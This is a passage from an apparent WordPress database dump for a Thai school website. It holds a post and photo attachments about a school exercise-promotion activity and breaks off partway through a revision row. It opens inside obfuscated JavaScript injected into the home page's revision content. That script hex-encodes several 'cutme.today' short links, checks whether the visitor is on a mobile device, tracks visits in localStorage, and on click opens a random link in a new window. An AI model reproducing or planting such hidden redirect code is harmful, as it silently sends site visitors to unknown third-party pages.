x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-06-09 14:07:01','2025-06-09 07:07:01','',14,'http://pakhaeng.ssk.in.th/?p=1316',0,'revision','',0),
(1317,1,'2025-06-09 14:22:55','2025-06-09 07:22:55','<!-- wp:paragraph -->\n<p>เมื่อวันที่ 6 มิถุนายน 2568 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ จัดกิจกรรมส่งเสริมการออกกำลังกายเพื่อสุขภาพที่ดีในโรงเรียน เพื่อในนักเรียนได้ออกกำลังกาย และหลักวิธิการออกกำลังกายอย่างถูกวิธี</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1318,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_12-1024x577.jpg\" alt=\"\" class=\"wp-image-1318\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1321,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_11-1024x768.jpg\" alt=\"\" class=\"wp-image-1321\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1319,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_10-1024x768.jpg\" alt=\"\" class=\"wp-image-1319\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1320,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_9-1024x768.jpg\" alt=\"\" class=\"wp-image-1320\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1322,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_8-1024x768.jpg\" alt=\"\" class=\"wp-image-1322\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1323,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_7-1024x768.jpg\" alt=\"\" class=\"wp-image-1323\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1325,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_6-1024x768.jpg\" alt=\"\" class=\"wp-image-1325\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1324,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_5-1024x768.jpg\" alt=\"\" class=\"wp-image-1324\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1326,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_4-1024x768.jpg\" alt=\"\" class=\"wp-image-1326\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1327,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_3-1024x768.jpg\" alt=\"\" class=\"wp-image-1327\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1328,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_2-768x1024.jpg\" alt=\"\" class=\"wp-image-1328\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1329,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_1-1024x768.jpg\" alt=\"\" class=\"wp-image-1329\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','โครงการส่งเสริมการออกกำลังกายเพื่อสุขภาพที่ดีในโรงเรียน','','publish','closed','closed','','%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%aa%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad%e0%b8%ad%e0%b8%81%e0%b8%81','','','2025-06-09 14:22:58','2025-06-09 07:22:58','',0,'http://pakhaeng.ssk.in.th/?p=1317',0,'post','',0),
(1318,1,'2025-06-09 14:22:17','2025-06-09 07:22:17','','LINE_ALBUM_อบรม กสทชส่งเาริมการออกกำลังกาย_250609_12','','inherit','','closed','','line_album_%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1-%e0%b8%81%e0%b8%aa%e0%b8%97%e0%b8%8a%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%b2%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad','','','2025-06-09 14:22:17','2025-06-09 07:22:17','',1317,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_12.jpg',0,'attachment','image/jpeg',0),
(1319,1,'2025-06-09 14:22:18','2025-06-09 07:22:18','','LINE_ALBUM_อบรม กสทชส่งเาริมการออกกำลังกาย_250609_10','','inherit','','closed','','line_album_%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1-%e0%b8%81%e0%b8%aa%e0%b8%97%e0%b8%8a%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%b2%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad-2','','','2025-06-09 14:22:18','2025-06-09 07:22:18','',1317,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_10.jpg',0,'attachment','image/jpeg',0),
(1320,1,'2025-06-09 14:22:18','2025-06-09 07:22:18','','LINE_ALBUM_อบรม กสทชส่งเาริมการออกกำลังกาย_250609_9','','inherit','','closed','','line_album_%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1-%e0%b8%81%e0%b8%aa%e0%b8%97%e0%b8%8a%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%b2%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad-3','','','2025-06-09 14:22:18','2025-06-09 07:22:18','',1317,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_9.jpg',0,'attachment','image/jpeg',0),
(1321,1,'2025-06-09 14:22:18','2025-06-09 07:22:18','','LINE_ALBUM_อบรม กสทชส่งเาริมการออกกำลังกาย_250609_11','','inherit','','closed','','line_album_%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1-%e0%b8%81%e0%b8%aa%e0%b8%97%e0%b8%8a%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%b2%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad-4','','','2025-06-09 14:22:18','2025-06-09 07:22:18','',1317,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_11.jpg',0,'attachment','image/jpeg',0),
(1322,1,'2025-06-09 14:22:20','2025-06-09 07:22:20','','LINE_ALBUM_อบรม กสทชส่งเาริมการออกกำลังกาย_250609_8','','inherit','','closed','','line_album_%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1-%e0%b8%81%e0%b8%aa%e0%b8%97%e0%b8%8a%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%b2%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad-5','','','2025-06-09 14:22:20','2025-06-09 07:22:20','',1317,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_8.jpg',0,'attachment','image/jpeg',0),
(1323,1,'2025-06-09 14:22:22','2025-06-09 07:22:22','','LINE_ALBUM_อบรม กสทชส่งเาริมการออกกำลังกาย_250609_7','','inherit','','closed','','line_album_%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1-%e0%b8%81%e0%b8%aa%e0%b8%97%e0%b8%8a%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%b2%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad-6','','','2025-06-09 14:22:22','2025-06-09 07:22:22','',1317,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_7.jpg',0,'attachment','image/jpeg',0),
(1324,1,'2025-06-09 14:22:22','2025-06-09 07:22:22','','LINE_ALBUM_อบรม กสทชส่งเาริมการออกกำลังกาย_250609_5','','inherit','','closed','','line_album_%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1-%e0%b8%81%e0%b8%aa%e0%b8%97%e0%b8%8a%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%b2%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad-7','','','2025-06-09 14:22:22','2025-06-09 07:22:22','',1317,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_5.jpg',0,'attachment','image/jpeg',0),
(1325,1,'2025-06-09 14:22:22','2025-06-09 07:22:22','','LINE_ALBUM_อบรม กสทชส่งเาริมการออกกำลังกาย_250609_6','','inherit','','closed','','line_album_%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1-%e0%b8%81%e0%b8%aa%e0%b8%97%e0%b8%8a%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%b2%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad-8','','','2025-06-09 14:22:22','2025-06-09 07:22:22','',1317,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_6.jpg',0,'attachment','image/jpeg',0),
(1326,1,'2025-06-09 14:22:23','2025-06-09 07:22:23','','LINE_ALBUM_อบรม กสทชส่งเาริมการออกกำลังกาย_250609_4','','inherit','','closed','','line_album_%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1-%e0%b8%81%e0%b8%aa%e0%b8%97%e0%b8%8a%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%b2%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad-9','','','2025-06-09 14:22:23','2025-06-09 07:22:23','',1317,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_4.jpg',0,'attachment','image/jpeg',0),
(1327,1,'2025-06-09 14:22:25','2025-06-09 07:22:25','','LINE_ALBUM_อบรม กสทชส่งเาริมการออกกำลังกาย_250609_3','','inherit','','closed','','line_album_%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1-%e0%b8%81%e0%b8%aa%e0%b8%97%e0%b8%8a%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%b2%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad-10','','','2025-06-09 14:22:25','2025-06-09 07:22:25','',1317,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_3.jpg',0,'attachment','image/jpeg',0),
(1328,1,'2025-06-09 14:22:26','2025-06-09 07:22:26','','LINE_ALBUM_อบรม กสทชส่งเาริมการออกกำลังกาย_250609_2','','inherit','','closed','','line_album_%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1-%e0%b8%81%e0%b8%aa%e0%b8%97%e0%b8%8a%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%b2%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad-11','','','2025-06-09 14:22:26','2025-06-09 07:22:26','',1317,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_2.jpg',0,'attachment','image/jpeg',0),
(1329,1,'2025-06-09 14:22:26','2025-06-09 07:22:26','','LINE_ALBUM_อบรม กสทชส่งเาริมการออกกำลังกาย_250609_1','','inherit','','closed','','line_album_%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1-%e0%b8%81%e0%b8%aa%e0%b8%97%e0%b8%8a%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%b2%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad-12','','','2025-06-09 14:22:26','2025-06-09 07:22:26','',1317,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_1.jpg',0,'attachment','image/jpeg',0),
(1330,1,'2025-06-09 14:22:55','2025-06-09 07:22:55','<!-- wp:paragraph -->\n<p>เมื่อวันที่ 6 มิถุนายน 2568 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ จัดกิจกรรมส่งเสริมการออกกำลังกายเพื่อสุขภาพที่ดีในโรงเรียน เพื่อในนักเรียนได้ออกกำลังกาย และหลักวิธิการออกกำลังกายอย่างถูกวิธี</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1318,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_12-1024x577.jpg\" alt=\"\" class=\"wp-image-1318\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1321,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_11-1024x768.jpg\" alt=\"\" class=\"wp-image-1321\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1319,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_10-1024x768.jpg\" alt=\"\" class=\"wp-image-1319\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1320,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_9-1024x768.jpg\" alt=\"\" class=\"wp-image-1320\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1322,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_8-1024x768.jpg\" alt=\"\" class=\"wp-image-1322\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1323,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_7-1024x768.jpg\" alt=\"\" class=\"wp-image-1323\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1325,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_6-1024x768.jpg\" alt=\"\" class=\"wp-image-1325\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1324,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_5-1024x768.jpg\" alt=\"\" class=\"wp-image-1324\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1326,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_4-1024x768.jpg\" alt=\"\" class=\"wp-image-1326\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1327,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_3-1024x768.jpg\" alt=\"\" class=\"wp-image-1327\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1328,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img 